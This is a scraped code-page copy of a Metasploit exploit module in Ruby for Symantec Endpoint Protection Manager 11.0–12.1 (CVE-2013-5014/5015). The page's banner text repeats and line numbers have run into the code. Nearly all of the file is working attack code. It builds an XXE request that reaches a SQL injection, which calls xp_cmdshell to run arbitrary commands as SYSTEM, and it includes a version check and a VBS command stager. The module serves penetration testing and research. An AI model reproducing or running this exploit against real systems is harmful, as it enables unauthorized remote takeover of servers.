Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Remote7Rank = ExcellentRanking89include REXML10include Msf::Exploit::CmdStager11include Msf::Exploit::Remote::HttpClient1213def initialize(info = {})14super(update_info(info,15'Name' => 'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution',16'Description' => %q{17This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager18versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker19can reach SQL injection affected components. As xp_cmdshell is enabled in the included20database instance, it's possible to execute arbitrary system commands on the target21with SYSTEM privileges.22},23'Author' =>24[25'Stefan Viehbock', # Discovery26'Chris Graham', # PoC exploit27'xistence <xistence[at]0x90.nl>' # Metasploit module28],29'License' => MSF_LICENSE,30'References' =>31[32['CVE', '2013-5014'],33['CVE', '2013-5015'],34['OSVDB', '103305'],35['OSVDB', '103306'],36['EDB', '31853'],37['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt']38],39'Arch' => ARCH_X86,40'Platform' => 'win',41'Targets' =>42[43['Windows VBS Stager', {}]44],45'Privileged' => true,46'DisclosureDate' => '2014-02-24',47'DefaultTarget' => 0))4849register_options(50[51Opt::RPORT(9090),52OptString.new('TARGETURI', [true, 'The base path', '/'])53])54deregister_options('CMDSTAGER::FLAVOR')55end5657def check58res = send_request_cgi(59{60'uri' => normalize_uri(target_uri.path),61'method' => 'GET',62})6364if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/65return Exploit::CheckCode::Appears66end6768Exploit::CheckCode::Safe69end7071def exploit72print_status("Sending payload")73# Execute the cmdstager, max length of the commands is ~395074execute_cmdstager({:flavor => :vbs, :linemax => 3950})75end7677def execute_command(cmd, opts = {})78# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.79command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"8081# Generate random 'xx032xxxx' sequence number.82seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"8384soap = soap_request(seqnum, command)8586post_data = Rex::MIME::Message.new87post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")88xxe = post_data.to_s8990res = send_request_cgi(91{92'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),93'method' => 'POST',94'vars_get' => { 'ActionType' => 'ConsoleLog' },95'ctype' => "multipart/form-data; boundary=#{post_data.bound}",96'data' => xxe,97})9899if res and res.body !~ /ResponseCode/100fail_with(Failure::Unknown, "#{peer} - Something went wrong.")101end102end103104def soap_request(seqnum, command)105randpayload = rand_text_alpha(8+rand(8))106randxxe = rand_text_alpha(8+rand(8))107entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"108entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"109110xml = Document.new111xml.add(DocType.new('sepm', "[ METASPLOIT ]"))112xml.add_element("Request")113xxe = xml.root.add_element(randxxe)114xxe.text = "PAYLOAD"115116xml_s = xml.to_s117xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding118xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding119120xml_s121end122end123124125126